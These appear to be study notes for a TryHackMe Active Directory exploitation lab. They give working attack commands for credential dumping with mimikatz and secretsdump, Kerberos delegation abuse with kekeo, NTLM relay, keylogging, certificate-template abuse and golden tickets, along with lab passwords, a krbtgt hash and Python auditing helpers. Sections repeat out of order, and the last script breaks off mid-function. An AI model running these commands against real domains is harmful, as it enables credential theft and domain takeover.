ChatGPT: Limits the delegation based on the services that a specific service account can access. It involves directly specifying which services a service account can delegate to, without directly involving the machine's identity. It focuses on restricting delegation to specific service types or accounts (iis_service delegating to db_service).
# Get the service account
`$serviceAccount = Get-ADUser -Identity "ServiceAccount"`
# Configure Constrained Delegation to the specified services (msDS-AllowedToDelegateTo) and enable protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION)
`Set-ADUser -Identity $serviceAccount -Add @{'msDS-AllowedToDelegateTo' = @('HTTP/Service1', 'HTTP/Service2')}`
`Set-ADAccountControl -Identity $serviceAccount -TrustedToAuthForDelegation $true`
# Check the Constrained Delegation settings
`Get-ADUser -Identity "ServiceAccount" -Properties msDS-AllowedToDelegateTo, TrustedToAuthForDelegation | Select-Object SamAccountName, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo`
=====Resource-Based Constrained Delegation:
msDS-AllowedToActOnBehalfOfOtherIdentity
Grant msDS-AllowedToActOnBehalfOfOtherIdentity to the [service] account on [MSSQL] and [CIFS].
This allows the service owner (the resource being accessed) to decide which accounts may delegate to it on behalf of other users.
ChatGPT: Goes beyond the service account level and associates the delegation capability with the computer objects. It designates the initiator (the machine account) and associates it with a specific service or SPN. This method allows a machine's identity to access a particular service (identified by SPN) on behalf of users accessing that machine's services.
# Get the service account and target computer
`$serviceAccount = Get-ADUser -Identity "ServiceAccount"`
`$targetComputer = Get-ADComputer -Identity "TargetComputer"`
# Allow the target computer to act on behalf of other identities towards the service account (writes msDS-AllowedToActOnBehalfOfOtherIdentity on ServiceAccount; the attribute is a security descriptor, not a DN string)
`Set-ADUser -Identity $serviceAccount -PrincipalsAllowedToDelegateToAccount $targetComputer`
# Check the Resource-Based Constrained Delegation settings
`Get-ADUser -Identity "ServiceAccount" -Properties PrincipalsAllowedToDelegateToAccount | Select-Object -ExpandProperty PrincipalsAllowedToDelegateToAccount`
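The three delegation types above are distinguished by two userAccountControl bits and two attributes, which is also why the WMI query earlier on this page finds domain controllers with the value 532480 (0x2000 SERVER_TRUST_ACCOUNT + 0x80000 TRUSTED_FOR_DELEGATION). As an added example written for this page (not the room's code and not ldapdomaindump's), the Python below decodes userAccountControl and classifies account records into unconstrained, constrained (with or without protocol transition) and resource-based delegation, skipping DCs because they are trusted for delegation by design. The records are constructed in the shape of an ldapdomaindump JSON export; the real msDS-AllowedToActOnBehalfOfOtherIdentity value is a binary security descriptor and is shown here already resolved to principal names. svcIIS is the page's own account; the other names are made up.

```python
# userAccountControl bits (ADS_USER_FLAG_ENUM) relevant to delegation and trust accounts
UAC_FLAGS = {
    0x00000002: "ACCOUNTDISABLE",
    0x00000200: "NORMAL_ACCOUNT",
    0x00001000: "WORKSTATION_TRUST_ACCOUNT",
    0x00002000: "SERVER_TRUST_ACCOUNT",            # domain controller
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00080000: "TRUSTED_FOR_DELEGATION",          # unconstrained delegation
    0x00100000: "NOT_DELEGATED",                   # "account is sensitive and cannot be delegated"
    0x00400000: "DONT_REQ_PREAUTH",
    0x01000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
}
SERVER_TRUST_ACCOUNT = 0x2000
TRUSTED_FOR_DELEGATION = 0x80000
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def delegation_kind(acct):
    """Which of the three delegation types (if any) this account record carries."""
    uac = acct.get("userAccountControl", 0)
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct.get("msDS-AllowedToDelegateTo"):
        # With protocol transition the service can obtain a ticket for any user
        # without that user ever authenticating to it (S4U2Self); that is the
        # property the kekeo walkthrough further down this page relies on.
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained (protocol transition)"
        return "constrained (Kerberos only)"
    if acct.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        return "resource-based"
    return None


def audit_delegation(accounts):
    """(sAMAccountName, kind, detail) for every non-DC account that can delegate."""
    findings = []
    for acct in accounts:
        kind = delegation_kind(acct)
        if kind is None:
            continue
        if kind == "unconstrained" and acct["userAccountControl"] & SERVER_TRUST_ACCOUNT:
            continue  # DCs are trusted for delegation by design (userAccountControl 532480)
        detail = (acct.get("msDS-AllowedToDelegateTo")
                  or acct.get("msDS-AllowedToActOnBehalfOfOtherIdentity")
                  or decode_uac(acct["userAccountControl"]))
        findings.append((acct["sAMAccountName"], kind, detail))
    return findings


# Constructed records (ldapdomaindump-like); names other than svcIIS are made up.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "THMDC$", "userAccountControl": 532480},
    {"sAMAccountName": "APPSRV01$", "userAccountControl": 0x1000 | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "svcIIS",
     "userAccountControl": 0x200 | 0x10000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["WSMAN/THMSERVER1", "http/THMSERVER1"]},
    {"sAMAccountName": "FILESRV01$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": ["svcIIS"]},
    {"sAMAccountName": "t2_lawrence.lewis", "userAccountControl": 0x200},
]

if __name__ == "__main__":
    print(decode_uac(532480))
    for finding in audit_delegation(SAMPLE_ACCOUNTS):
        print(finding)
```

Unconstrained delegation on anything other than a DC and constrained delegation with protocol transition are the two findings to act on first: the former caches every connecting user's TGT on that host, the latter lets a compromised service account mint tickets for arbitrary users to the listed SPNs. Setting NOT_DELEGATED on tier 0 accounts (or putting them in Protected Users) blocks both paths for those accounts regardless of how the services are configured.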
=====Enumerate Users with Constrained Delegation
`Import-Module C:\tools\PowerView.ps1 ; Get-NetUser -TrustedToAuth`
output: samaccountname: svcIIS msds-allowedtodelegateto: WSMAN... http...
`Get-CimInstance -ClassName Win32_Service | Where-Object {$_.StartName -like 'svcIIS*'} | Select-Object *`
Analyzing the output, we find a service that auto-starts at boot under the svcIIS account and executes C:\Windows\system32\cmd.exe. That spawns a command prompt and causes the account's credential to be cached in memory.
`mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"`
got cred: svcIIS@za.tryhackme.loc:Password1@
=====Remotely Dumping Secrets
`impacket-secretsdump 'za.tryhackme.loc/t2_lawrence.lewis:strong.pass1@thmwrk1.za.tryhackme.loc'`
got cred: svcIIS@za.tryhackme.loc:Password1@
=====Request a TGT and Perform the Attack
mimikatz # token::revert
`C:\Tools\kekeo\x64\kekeo.exe`
Request a TGT using the svcIIS credentials.
kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
Request a S4U TGS on behalf of t1_trevor.jones to the HTTP service on THMSERVER1 using the TGT
kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
Request a S4U TGS on behalf of t1_trevor.jones to the WSMAN service on THMSERVER1 using the TGT
kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc
=====Inject the S4U TGS tickets into our current session as the tier 2 admin and launch a command prompt.
mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
mimikatz # misc::cmd
`klist` should now show 2 cached tickets
`winrs -r:thmserver1.za.tryhackme.loc cmd`
Exploiting Automated Relays
We can force a computer account to initiate an authentication request. Computer accounts (their names end in $), like user accounts, have a username and password.
custom Bloodhound query to find computer accounts that have admin rights over other computer accounts
`MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p`
=====Verify: Print Spooler Service running + SMB Signing not enforced
Verify the Print Spooler Service is Running
`Get-WmiObject Win32_Printer -Computer hostname.fqdn`
OR
`Get-PrinterPort -ComputerName hostname.fqdn`
Verify SMB Signing Enforcement
`nmap -Pn -p445 --script=smb2-security-mode thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc`
`crackmapexec smb thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc`
=====Exploiting Authentication Relays
We want to use NTLM authentication against the THMSERVER1. THMSERVER2 has administrative privileges over THMSERVER1.
Use SpoolSample.exe to connect to THMSERVER2 and tell it to authenticate back to us
We will relay that authentication request to THMSERVER1. THMSERVER1 will see it as though we are connecting as THMSERVER2 , which will give us administrative privileges
`ntlmrelayx.py -smb2support -t smb://"10.200.60.201" -debug`
THMWRK1 RDP> C:\Tools\SpoolSample.exe thmserver2.za.tryhackme.loc "kali-vpn-ip"
Exploiting AD Users Hunting for Credentials
=====Using Meterpreter's Keylogger
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
=====KeePass Vault file
got .kdbx file password: Imreallysurenoonewillguessmypassword
`apt install -y kpcli`
`kpcli`
kpcli:/> open PasswordDatabase.kdbx
kpcli:/> ls
kpcli:/> ls PasswordDatabase/*
kpcli:/> show -f -a PasswordDatabase/General/Flag
THM{AD.Users.Can.Give.Up.Good.Secrets}
kpcli:/> show -f -a PasswordDatabase/General/svcServMan
Sup3rStr0ngPass!@
Exploiting Group Policy Objects
Bloodhound shows that svcServMan has ownership over a GPO.
note: GPOs are saved in the SYSVOL directory when they are synchronized from the domain controller.
RDP into THMWRK1 as standard domain user or T2 admin
`xfreerdp /v:thmwrk1.za.tryhackme.loc /u:username /p:'password'`
Inject the svcServMan as a network credential
`runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe`
open `mmc.exe` in the new cmd window
Edit the GPO remotely on THMSERVER2 via MMC
Console_Root>>Group_Policy_Management>>Forest:tryhackme.loc>>Domains>>za.tryhackme.loc>>Servers>>Management_Servers>Management_Server
Add_Group>>Browse>>Search"IT Support">> Click OK
Make "IT Support" Administrators and Remote Desktop Users on THMSERVER2
Now we can use low-level user cred from http://distributor.za.tryhackme.loc/creds , as this user is a member of the IT Support group after we added the user
Exploiting Group Policy Objects
`certutil -Template -v > .\templates.txt`
A certificate template can be exploited if the following parameters are present:
Client Authentication: Certificate can be used in client authentication
CT_FLAG_ENROLEE_SUPPLIES_SUBJECT: Can specify an alternate SAN
CTPRIVATEKEY_FLAG_EXPORTABLE_KEY: Can export the private key along with the certificate
Certificate Permissions: User has the permissions to use the template
=====Exploit a Certificate Template
Launch mmc.exe and add the Certificates snap-in.
Follow along with the steps to request a new Personal certificate.
Follow the steps to export the certificate along with the private key.
# Use Rubeus to Inject the Certificate
`Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\username\Desktop\mycert.pfx /password:password123 /outfile:pwnz.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101`
# Use Mimikatz to Pass-the-Ticket
`mimikatz.exe "privilege::debug" "kerberos::ptt pwnz.kirbi" "misc::cmd"
enter file `explorer.exe` in the new cmd window
Now we can browse \\thmdc.za.tryhackme.loc\C$ file system
Exploiting Domain Trusts
A forest, in Active Directory terms, is comprised of domain trees Trusts define how the various domains in a forest can talk to one another
The main types of trusts are :
Directional: Trust flows from one domain to another trusted domain
Transitive: Trust flows between multiple trusted domains
=====Golden Tickets
If an attacker compromises a domain controller and achieves full SYSTEM rights, it is possible to extract the hash of the krbtgt account. This would allow the attacker to create TGS tickets for any resources
In order to create golden tickets, the following must be known:
FQDN of the domain
SID of the domain
Username to impersonate
KRBTGT hash
mimikatz # lsadump::dcsync /user:za\krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
now verify by browse file system \\thmrootdc.tryhackme.loc\C$
`openvpn --config ./exploitingad.ovpn --daemon`
edit /etc/resolv.conf and put 'search za.tryhackme.loc' and 'nameserver 10.200.60.101' above any other nameserver (the .101 host is THMDC, the lab's DNS server; if NetworkManager rewrites the file, set the DNS on the tun interface instead)
`systemctl restart networking.service`
test DNS: `ping za.tryhackme.loc` and `nslookup thmdc.za.tryhackme.loc`
get the low-privileged starting credentials from http://distributor.za.tryhackme.loc/creds
Exploiting Permission Delegation
=====Exploiting ACEs: Access Control Entries (ACEs) populate Discretionary Access Control Lists (DACLs). These ACLs determine the permissions that certain AD objects have over others.
ForceChangePassword : Set a user's password without knowing their current password.
AddMembers : Add users (including oneself), groups, or computers to a target group.
GenericAll : Complete control over an object, including the ability to change the user's password, register an SPN or add an AD object to the target group.
GenericWrite : Update any non-protected parameters of our target object. For example, could update the scriptPath parameter, which would set a user's logon script.
WriteOwner : Update the owner of the target object. Could make ourselves the owner, allowing us to gain additional permissions over the object.
WriteDACL : We have the ability to write new ACEs to the target object's DACL. For example, could write an ACE that grants our account full control over the target object.
AllExtendedRights : Perform any action associated with extended AD rights against the target object. For example, the ability to force change a user's password.
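Added example, not part of these notes: a Python classifier that turns an object's DACL, exported as SDDL (for instance `(Get-Acl 'AD:\<object DN>').Sddl` from the ActiveDirectory module), into the edge names listed above, the way BloodHound derives them. The extended-right and attribute GUIDs are the well-known schema values; the EXAMPLE_SDDL string and every SID in it are constructed for the example.

```python
import re

# Well-known schema GUIDs behind the edge names (extended rights / attributes)
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"   # User-Force-Change-Password
MEMBER_ATTR = "bf9679c0-0de6-11d0-a285-00aa003049e2"             # 'member' attribute
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# SDDL two-letter rights tokens -> ACCESS_MASK bits
RIGHT_BITS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
    "CC": 0x01, "DC": 0x02, "LC": 0x04, "SW": 0x08, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}


def rights_mask(token):
    """'GWWD' -> bits; SDDL may also carry the mask as a hex literal."""
    if token.startswith("0x"):
        return int(token, 16)
    return sum(RIGHT_BITS.get(token[i:i + 2], 0) for i in range(0, len(token), 2))


def parse_dacl(sddl):
    """Yield (ace_type, access_mask, object_guid, trustee) for each ACE in D:.
    Plain ACEs only; conditional ACEs (nested parentheses) are not handled."""
    m = re.search(r"D:[A-Z_]*((?:\([^()]*\))*)", sddl)
    if not m:
        return
    for ace in re.findall(r"\(([^()]*)\)", m.group(1)):
        fields = ace.split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inh_guid, trustee = fields[:6]
        yield ace_type, rights_mask(rights), obj_guid.lower(), trustee


def classify(mask, obj_guid):
    """Map one allow ACE to the edge it yields, or None if it is harmless.
    Order matters: a mask with several bits reports the strongest right."""
    if mask & RIGHT_BITS["GA"]:
        return "GenericAll"
    if mask & RIGHT_BITS["WD"]:
        return "WriteDacl"
    if mask & RIGHT_BITS["WO"]:
        return "WriteOwner"
    if mask & RIGHT_BITS["GW"]:
        return "GenericWrite"
    if mask & RIGHT_BITS["WP"]:
        if obj_guid == "":
            return "GenericWrite"        # write every attribute (scriptPath, SPN, member, ...)
        if obj_guid == MEMBER_ATTR:
            return "AddMember"           # WriteProperty limited to 'member'
    if mask & RIGHT_BITS["CR"]:
        if obj_guid == "":
            return "AllExtendedRights"
        if obj_guid == FORCE_CHANGE_PASSWORD:
            return "ForceChangePassword"
        if obj_guid in (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL):
            return "GetChanges"          # both GUIDs together allow DCSync
    return None


def abusable_aces(sddl):
    """Return [(trustee, edge)] for the allow ACEs that give control."""
    found = []
    for ace_type, mask, obj_guid, trustee in parse_dacl(sddl):
        if ace_type not in ("A", "OA"):  # skip deny (D/OD) and audit (AU) ACEs
            continue
        edge = classify(mask, obj_guid)
        if edge:
            found.append((trustee, edge))
    return found


# Constructed DACL for a made-up 'IT Support' group object; the edges mirror
# the shape of the BloodHound findings in the notes. SIDs/RIDs are invented.
EXAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPLCLORC;;;AU)"                                                  # read only
    "(A;;GW;;;DU)"                                                        # Domain Users: GenericWrite
    "(OA;;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-1-2-3-1107)"  # write 'member' only
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1-2-3-1105)"  # reset password
    "(D;;WD;;;S-1-5-21-1-2-3-1106)"                                       # deny, ignored
)

if __name__ == "__main__":
    for trustee, edge in abusable_aces(EXAMPLE_SDDL):
        print(f"{trustee:28} {edge}")
```

A deny ACE never produces an edge, and an object ACE whose GUID is not one of the listed rights (for example write access to a single harmless attribute) is reported as nothing, which is the same filtering BloodHound applies.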
=====Inspecting Bloodhound Data
Our user account is a member of the 'Domain Users' group, which has 'GenericWrite' over the 'IT Support' group (GenericWrite on a group includes writing its member attribute, so we can add ourselves).
`$user = Get-ADUser -Identity 'user.name' ; $group = Get-ADGroup -Identity 'IT Support'`
`Add-ADGroupMember -Identity $group -Members $user ; Get-ADGroupMember -Identity $group`
The 'IT Support' group has 'ForceChangePassword' over the members of the 'Tier 2 Admins' group, so once we are in IT Support we can reset one of their passwords (if the reset is denied, log out and back in so the new group membership is in your Kerberos ticket).
`$t2admin = Get-ADGroupMember -Identity 'Tier 2 Admins' | Get-Random -Count 1`
`$password = 'strong.pass1' | ConvertTo-SecureString -AsPlainText -Force`
`Set-ADAccountPassword -Identity $t2admin -Reset -NewPassword $password`
`xfreerdp /v:thmwrk1.za.tryhackme.loc /u:'t2_username' /p:'strong.pass1'`
note: a password reset locks the real user out and is logged (event 4724), so on a real engagement get approval or pick a reversible change first
Exploiting Kerberos Delegation
Kerberos delegation lets an application or service access a resource on another machine on behalf of a user (or machine).
If a user logs into a web application, the application can then request resources on the backend (database, file server) as that user instead of as itself.
This removes the need for one global service account holding broad, coarse permissions to every backend.
=====Unconstrained Delegation:
TRUSTED_FOR_DELEGATION (userAccountControl bit 0x80000) on the service/computer account
A host with this flag can act as any user who authenticates to it, against any service: when the user connects, the client sends a forwardable TGT along with the service ticket and the host caches that TGT in LSASS, so anyone with SYSTEM on the host can reuse it (mimikatz sekurlsa::tickets). Only users marked 'account is sensitive and cannot be delegated' or in Protected Users are immune.
# Enable unconstrained delegation on the service account (needs SeEnableDelegationPrivilege, i.e. a Domain Admin)
`Set-ADAccountControl -Identity ServiceAccount -TrustedForDelegation $true`
# Check: TrustedForDelegation is the 0x80000 bit of userAccountControl
`Get-ADUser -Identity ServiceAccount -Properties TrustedForDelegation,userAccountControl | Select-Object TrustedForDelegation,userAccountControl`
=====Constrained Delegation:
TRUSTED_TO_AUTH_FOR_DELEGATION (userAccountControl bit 0x1000000, "protocol transition")
msDS-AllowedToDelegateTo (list of SPNs the account may delegate to)
Restricts which services (SPNs) a service account may request tickets for on behalf of a user. Without protocol transition (Kerberos only) the account needs a forwardable ticket from a real user logon; with protocol transition it can use S4U2Self to obtain a ticket for any user without that user ever authenticating, which is what makes a compromised svcIIS password enough below.
# Set the allowed target SPNs on the service account
`Set-ADUser -Identity ServiceAccount -Add @{'msDS-AllowedToDelegateTo'=@('HTTP/Service1','HTTP/Service2')}`
# Optional: allow protocol transition (S4U2Self for any user)
`Set-ADAccountControl -Identity ServiceAccount -TrustedToAuthForDelegation $true`
# Check the constrained delegation settings (attribute names with a hyphen must be quoted)
`Get-ADUser -Identity ServiceAccount -Properties 'msDS-AllowedToDelegateTo',TrustedToAuthForDelegation | Select-Object TrustedToAuthForDelegation,'msDS-AllowedToDelegateTo'`
=====Resource-Based Constrained Delegation:
msDS-AllowedToActOnBehalfOfOtherIdentity (a security descriptor stored on the RESOURCE, e.g. the MSSQL or CIFS server's computer object)
Instead of listing target SPNs on the front-end account, the target lists which accounts are allowed to impersonate users to it. This lets the owner of the resource decide who may delegate to it, without SeEnableDelegationPrivilege; anyone with write access to the target computer object (GenericWrite/WriteDacl, or the account that joined it to the domain) can therefore add a principal they control.
# Get the account that will be allowed to delegate (a computer or user object we control)
`$frontEnd = Get-ADComputer -Identity FrontEndComputer`
# Write the descriptor on the TARGET (the cmdlet builds msDS-AllowedToActOnBehalfOfOtherIdentity for you)
`Set-ADComputer -Identity TargetComputer -PrincipalsAllowedToDelegateToAccount $frontEnd`
# Check the resource-based constrained delegation settings on the target
`Get-ADComputer -Identity TargetComputer -Properties PrincipalsAllowedToDelegateToAccount | Select-Object -ExpandProperty PrincipalsAllowedToDelegateToAccount`
=====Enumerate Users with Constrained Delegation
`Import-Module C:\tools\PowerView.ps1 ; Get-NetUser -TrustedToAuth`
output: samaccountname: svcIIS msds-allowedtodelegateto: WSMAN... http...
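Added example, not part of these notes: the checks behind that PowerView output in Python, i.e. which delegation mode an account's userAccountControl bits and msDS-AllowedToDelegateTo list amount to, whether a chosen victim can be delegated at all, how the allowed SPNs map to hosts, and the SDDL that resource-based constrained delegation stores on the target. SVCIIS_UAC and SVCIIS_SPNS are constructed sample values shaped like the output above; the SID passed to rbcd_sddl is invented.

```python
# userAccountControl bits (MS-ADTS 2.2.16)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained
NOT_DELEGATED = 0x100000                    # "sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained + protocol transition


def delegation_type(uac, allowed_to_delegate_to=()):
    """Classify from the UAC bits plus the msDS-AllowedToDelegateTo list.
    PowerView's -TrustedToAuth filters on the 0x1000000 bit alone;
    the SPN list is what decides where the account can actually go."""
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if allowed_to_delegate_to:
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            # S4U2Self lets the account mint a ticket for ANY user itself,
            # so a stolen password is enough (the kekeo flow in the notes).
            return "constrained-protocol-transition"
        # Kerberos-only: needs a forwardable ticket from a real user logon.
        return "constrained-kerberos-only"
    return "none"


def can_be_impersonated(uac, in_protected_users=False):
    """Victim side: the KDC refuses S4U2Proxy for sensitive accounts and
    members of Protected Users, so check before picking a target user."""
    return not (uac & NOT_DELEGATED) and not in_protected_users


def hosts_from_spns(spns):
    """Group the allowed SPNs by host. The KDC checks the full SPN against
    the list, but the service class in the issued ticket is unencrypted and
    the target never verifies it, so a ticket for http/host can be rewritten
    to cifs/host, host/host, ... (Rubeus /altservice) on the same machine."""
    hosts = {}
    for spn in spns:
        service, _, host = spn.partition("/")
        hosts.setdefault(host.split(":")[0].lower(), set()).add(service.lower())
    return hosts


def rbcd_sddl(principal_sid):
    """SDDL of the security descriptor written to the TARGET computer's
    msDS-AllowedToActOnBehalfOfOtherIdentity: one allow ACE with full
    rights for the principal that may act on behalf of other users."""
    return f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{principal_sid})"


# Constructed sample: shape of the Get-NetUser -TrustedToAuth hit above
SVCIIS_UAC = 0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION   # NORMAL_ACCOUNT + protocol transition
SVCIIS_SPNS = ["WSMAN/THMSERVER1", "WSMAN/THMSERVER1.za.tryhackme.loc",
               "http/THMSERVER1", "http/THMSERVER1.za.tryhackme.loc"]

if __name__ == "__main__":
    print(delegation_type(SVCIIS_UAC, SVCIIS_SPNS))
    print(hosts_from_spns(SVCIIS_SPNS))
    print(rbcd_sddl("S-1-5-21-1-2-3-1108"))
```

Feed real values by reading userAccountControl and msDS-AllowedToDelegateTo over LDAP; rbcd_sddl is the same string the PowerShell RawSecurityDescriptor approach uses before it is serialised into the binary attribute.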
`Get-CimInstance -ClassName Win32_Service | Where-Object {$_.StartName -like 'svcIIS*'} | Select-Object *`
From the output: a service that runs as svcIIS is set to start automatically and its PathName is C:\Windows\system32\cmd.exe. Because the Service Control Manager must log that account on at boot, its password is stored as an LSA secret on THMWRK1, which a local admin can dump.
`mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"`
got cred: svcIIS@za.tryhackme.loc:Password1@
=====Remotely Dumping Secrets (same LSA secrets over the network, using the T2 admin we reset above)
`impacket-secretsdump 'za.tryhackme.loc/t2_lawrence.lewis:strong.pass1@thmwrk1.za.tryhackme.loc'`
got cred: svcIIS@za.tryhackme.loc:Password1@
=====Request a TGT and Perform the Attack
mimikatz # token::revert
`C:\Tools\kekeo\x64\kekeo.exe`
Request a TGT using the svcIIS credentials.
kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
Request an S4U TGS on behalf of t1_trevor.jones (a t1_ account, i.e. a Tier 1 admin with rights on the servers) to the HTTP service on THMSERVER1 using that TGT. kekeo does S4U2Self then S4U2Proxy; protocol transition means Trevor never has to log in.
kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
Request an S4U TGS on behalf of t1_trevor.jones to the WSMAN service on THMSERVER1 using the TGT (winrs needs both http and wsman)
kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc
=====Inject the S4U TGS tickets into our current session (the T2 admin RDP session) and launch a command prompt.
mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
mimikatz # misc::cmd
`klist` should now show the 2 cached tickets for t1_trevor.jones
`winrs -r:thmserver1.za.tryhackme.loc cmd`
Exploiting Automated Relays
Computer accounts (names end in $) have a username and password like user accounts, and we can force a computer to initiate an authentication request (here via the print spooler) and relay it to a host where that computer account has rights.
custom BloodHound query to find computer accounts that have admin rights over other computer accounts:
`MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p`
=====Verify: Print Spooler Service running on the source + SMB signing not enforced on the target
Verify the Print Spooler Service is running (both calls depend on the spooler; an RPC/spooler error means it is not running)
`Get-WmiObject Win32_Printer -ComputerName hostname.fqdn`
OR
`Get-PrinterPort -ComputerName hostname.fqdn`
Verify SMB Signing Enforcement (the relay target must report "Message signing enabled but not required" / signing:False)
`nmap -Pn -p445 --script=smb2-security-mode thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc`
`crackmapexec smb thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc`
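Added example, not part of these notes or of the nmap/crackmapexec scripts: the SMB2 NEGOTIATE exchange those tools use to read the server's SecurityMode field, in Python. `probe(host)` sends a real NEGOTIATE to port 445 and reports whether signing is required; `fake_negotiate_response` is a constructed server reply (not captured traffic) so the parser can be checked offline. Offering only dialects up to 3.0.2 keeps the request at its fixed 36-byte layout with no negotiate contexts.

```python
import socket
import struct
import uuid

SMB2_NEGOTIATE = 0x0000
SIGNING_ENABLED = 0x0001    # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002   # SMB2_NEGOTIATE_SIGNING_REQUIRED
DIALECTS = (0x0202, 0x0210, 0x0300, 0x0302)   # no 3.1.1: avoids negotiate contexts


def smb2_header(command, flags=0, status=0):
    """64-byte SMB2 header (MS-SMB2 2.2.1.2): message id 0, no session/tree."""
    fixed = struct.pack("<HHIHHIIQIIQ", 64, 0, status, command, 1, flags, 0, 0, 0, 0, 0)
    return b"\xfeSMB" + fixed + b"\x00" * 16       # 16-byte signature, unsigned


def netbios(msg):
    """NetBIOS session service header: type 0x00 + 24-bit length."""
    return struct.pack(">I", len(msg)) + msg


def negotiate_request():
    """SMB2 NEGOTIATE request (2.2.3); client says signing enabled, not required."""
    body = struct.pack("<HHHHI", 36, len(DIALECTS), SIGNING_ENABLED, 0, 0)
    body += uuid.uuid4().bytes + struct.pack("<Q", 0)          # ClientGuid, ClientStartTime
    body += b"".join(struct.pack("<H", d) for d in DIALECTS)
    return netbios(smb2_header(SMB2_NEGOTIATE) + body)


def parse_negotiate_response(packet):
    """Return (security_mode, dialect) from a raw reply (NetBIOS + SMB2)."""
    hdr = packet[4:68]
    if len(hdr) != 64 or hdr[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 packet")
    status, command = struct.unpack_from("<IH", hdr, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError("not a successful NEGOTIATE response")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", packet, 68)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response structure size")
    return security_mode, dialect


def signing_posture(security_mode):
    """What nmap smb2-security-mode / crackmapexec print, reduced to one word."""
    if security_mode & SIGNING_REQUIRED:
        return "required"      # relayed sessions cannot be signed: not a relay target (DC default)
    if security_mode & SIGNING_ENABLED:
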